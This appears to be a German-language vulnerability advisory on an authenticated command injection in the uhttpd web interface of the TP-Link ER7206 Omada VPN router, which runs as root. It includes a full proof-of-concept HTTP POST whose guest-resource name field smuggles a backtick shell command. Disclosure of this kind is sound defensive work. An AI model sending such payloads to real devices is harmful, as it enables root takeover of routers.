
TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Command-Injection-Schwachstelle
TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Befehlsinjektions-Schwachstelle
In der Gastressourcen-Funktionalität des Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591 besteht eine Schwachstelle, die eine Befehlsausführung ermöglicht. Eine speziell gestaltete HTTP-Anfrage kann zur Ausführung beliebiger Befehle führen. Ein Angreifer kann eine authentifizierte HTTP-Anfrage senden, um diese Schwachstelle auszulösen.
Die unten aufgeführten Versionen wurden entweder von Talos getestet oder als anfällig verifiziert oder vom Hersteller als anfällig bestätigt.
Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591
ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/
Der ER7206 Omada Gigabit VPN Router ist eine leistungsstarke Netzwerklösung, die Gigabit-Konnektivität, hochsichere VPN-Verbindungen und die Integration mit Omada SDN für zentrales Cloud-Management und Zero-Touch-Provisioning unterstützt.
Der ER7206 Omada Gigabit VPN Router führt verschiedene Dienste aus, um den Router oder mit dem Router verbundene Geräte zu verwalten. Ein solcher Dienst ist uhttpd, der auf Port 80/443 läuft. Er bietet Benutzern eine Weboberfläche zur Konfiguration und Verwaltung des Routers. Standardmäßig läuft der Dienst als Root-Benutzer. Ein Angreifer kann Root-Zugriff auf das Gerät erlangen, indem er diesen Dienst ausnutzt.
Im uhttpd-Dienst besteht eine Befehlsinjektions-Schwachstelle, wenn dem Gerät eine Gastressource hinzugefügt wird. In der Weboberfläche kann die Seite für Gastressourcen aufgerufen werden, indem man zu Authentication -> Authentication Settings -> Guest Resources navigiert. Sie enthält Funktionen zum Hinzufügen, Bearbeiten und Löschen von Gastressourcen. Wenn eine Gastressource hinzugefügt wird, löst dies die folgende HTTP-POST-Anfrage aus:
POST /cgi-bin/luci/;stok=b53d9dc12fe8aa66f4fdc273e6eaa534/admin/freeStrategy?form=strategy_list HTTP/1.1
Host: 192.168.8.100
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: sysauth=8701fa9dc1908978bc804e7d08931706
Content-Length: 470
data=%7B%22method%22%3A%22add%22%2C%22params%22%3A%7B%22index%22%3A0%2C%22old%22%3A%22add%22%2C%22new%22%3A%7B%22name%22%3A%22DDDDL|`/usr/bin/id>/tmp/had`%22%2C%22strategy_type%22%3A%22five_tuple%22%2C%22src_ipset%22%3A%22%2F%22%2C%22dst_ipset%22%3A%22%2F%22%2C%22mac%22%3A%22%22%2C%22sport%22%3A%22-%22%2C%22dport%22%3A%22-%22%2C%22service_type%22%3A%22TCP%22%2C%22zone%22%3A%22LAN1%22%2C%22comment%22%3A%22%22%2C%22enable%22%3A%22on%22%7D%2C%22key%22%3A%22add%22%7D%7D